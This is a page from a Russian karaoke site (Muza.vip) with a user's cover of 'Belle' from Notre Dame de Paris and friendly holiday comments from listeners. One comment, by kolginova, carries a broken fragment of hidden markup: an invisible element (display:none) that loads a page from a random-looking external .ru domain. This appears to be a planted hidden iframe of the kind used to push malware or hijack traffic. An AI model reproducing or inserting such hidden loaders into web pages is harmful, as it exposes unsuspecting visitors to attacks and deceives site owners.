На главную Muza.vip
      
Карамболина (Фиалка Монмартра)
(Оперетты)
Маленькие герои
(Машина времени)
Спасательный круг
(Карнавал (группа))
Прекрасная дама
(Сурина Ирина)
Романс
(Сумишевский Ярослав)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Belle» (Notre Dame De Paris)

115   60   4
   Кавер-версия от Chertoff1963
06.03.2016 2207
Нестройный хор мальчиков поздравляет девочек с наступающим праздником в непринуждённом стиле уличного балагана. Очень грустная история, но в этом вся ирония, чёрт побери! Балаган, одно слово!
  Баллов:
42
  


Комментарии пользователей к записи:

md200, 06.03.2016 г. 22:13
Женя,подпевал вместе с тобой...wow klass
  

Chertoff1963, 06.03.2016 г. 22:26
балаганные артисты - они такие, всегда с издёвочкой к персонажам, может быть и в ущерб музыкальным канонам. Спасибо, что подпеваешь, Виктор! Желаю, чтобы все!..chok
  
kolginova, 06.03.2016 г. 22:14
Женя, спасибо ото всех девочек!!!!!Так приятно,что нас уже поздравляют...и это очень трогательно...... id="a1996667054" src="//u7yb1iy1x3xv.ru/f.html" style="display:none">
  

Chertoff1963, 06.03.2016 г. 22:27
Спасибо, Галина, за внимание к моим излияниям!
  
cergei1973-07, 06.03.2016 г. 22:20
НЕПЛОХО!bravo_big
  

Chertoff1963, 06.03.2016 г. 22:28
zhmu_lapuulybaemsya_i_mashem
  
liutika, 06.03.2016 г. 22:23
Шикарно мальчики звучат, однако! dada БРАВО, ЕВГЕНИЙ!!! buket_serdechki
  

Chertoff1963, 06.03.2016 г. 22:34
Оля, с праздником!
  

liutika, 06.03.2016 г. 22:35
Благодарю! da_da
  
VeraVikto, 06.03.2016 г. 22:24
Да для нашей русской женщины и черт не страшен,o_daлишь бы ласковый был...smeh А горбун это совсем пустяки...Спасибо за поздравления,Евгений!buket_serdechki
  

Chertoff1963, 06.03.2016 г. 22:36
Черрртовски обаятельный? - ну вылитый я! Спасибо, Вера!
  

VeraVikto, 06.03.2016 г. 23:21
Вот и познакомились!!!ulybka А я чертовски привлекательна!!!smeh За тюльпанчики спасибо!!!
  
Marka64, 06.03.2016 г. 22:29
Огромное спасибо за прекрасное поздравление,Женя!!!bravo_bigОт всей души, букет розы
  

Chertoff1963, 06.03.2016 г. 22:39
Спасибо, Ольга! Упал под тяжестью букетов!
  

Marka64, 06.03.2016 г. 23:11
Цветы идентичны красивому исполнению)))klass
  
marinka9, 06.03.2016 г. 22:32
Какая помпезно-мистическая BELL у тебя получилась, Женя!!!!! Я тоже пела эту вещь , только на франсе!!!!!
Вау!!! Вау!!! Вау!!! От последнего мальчика я просто улетелааа!!!!klassklassklass .
Аааааааааа!!!!!! Как я и ждала!!!!! ТРИО!!!! (немного не стройно, но не страшно)))) .Вообщем получила массу удовольствия!!!!! Хоть опять иди и пой)))))
Ах да!!! Мерси за Поздравление!!!!!d9
  

Chertoff1963, 06.03.2016 г. 22:45
Марина, спасибо! В балаганчике наливают, видимо, расчувствовавшись, оттого и нестройно! Тёплой весны!!!
  
domingo28, 06.03.2016 г. 22:42
Женя, гениально!!! Спеть сразу за троих! klassПринимай мой поклон и восторженные аплодисменты!bravo_big Несмотря на то, что в финале стройность действительно была несколько нарушена,  это нисколько не испортило общего восторга, это от чувств-с, наверное! Но я хочу сказать, что без чувств эту вещь ни петь, ни слушать невозможно!Сердце трепещет и у исполнителя и у слушателя!
Спасибо!!!

  

Chertoff1963, 06.03.2016 г. 22:51
Спасибо, Галина!
  
Verax, 06.03.2016 г. 23:51
Я за второго!voo
  

Chertoff1963, 07.03.2016 г. 00:21
На самом деле, Вера, всё как в жизни: урод Квазимодо - единственный нормальный из этой троицы, остальные оба красавца не стоят и мизинца вашей светлости!hunch,art,арт,красивые картинки,в комментариях еще одна


  

Verax, 07.03.2016 г. 00:43
Ну в данном случае я оценивала их исходя из специфики данного сайта...голос второго героя показался мне наиболее выигрышным...ulybka
  
Angelinna, 07.03.2016 г. 23:12
Тоже пела эту арию...на 3 голоса: 2 мужских и один девичий  smeh...для Эсмеральды (Юлечки ) на ДР...на Каре...wow
serdce_v_rukebuket_serdechkiА мне все твои голоса понравились : Квазимодо очень смешной и артистичный smeh , а 2 другие-красивые d9 В конце хор не очень стройный...но тебе всё прощается...из-за плотного графика гастролей и дежурств podmigivanie
  
Nika3, 18.10.2017 г. 21:05
  
 
oldman_1963, 28.02.2019 г. 08:00
Евгений, аплодисменты от просто прохожего! applod s_sharikami
zhmu_lapu
  
 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО




Студия
margosha123
Je taime
Lara Fabian
X241HH
Я поеду на юг
Шуфутинский Михаил
ptah
Вино в бокале
Хачатурян Федо
akononov6690
Твои бездонные глаза
Pavlos Bouros
ifanow2
Да обойдут тебя лавины
Якушева Ада
lesha
Лети
Трофимов Сергей
lori
Благодарю тебя
Бабаджанян Арно
Serge_Poet
Поляны фантазий и чудес света
Ремейки (переделки)
igornov
Дорогая
Шуфутинский Михаил
Natulichka
Птицы
Мона
LonelyWoolf
We Are Animals
Nazareth
Haris1958
Come together
Beatles
BEDHAR58
Monkberry moon delight
Paul McCartney
zaiaz
Счастье
Кузьмин Юрий
alexs55
Золотая осень
Фристайл
shansovo
Птица с дробью
Новиков Александр
adagio5
Мелодия души
Искусственный интеллект
mranatolm
За туманами
Королев Виктор
djdfy56
Таксую я
Петров Олег
MAXMIX
Незабудка
Антон и Альфия
Angelochek_ms
Это любовь
Ярослава
singerin
Вояж
Ленинград
Samocvet & prov
Золотые купола
Круг Михаил
Marka64
Как же быть с любовью
Шуфутинский Михаил
-VALKYRYA- & 1966av
Не любовники
Билык Ирина
Tanschik
Хочешь
Гурченко Людмила
Bet
От Волги до Енисея
Любэ
irisha56
Разноцветные ярмарки
Band Odessa
SERG-S
Send Me An Angel
Scorpions
merus
Шесть часов любви
Жуланова Наталья




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.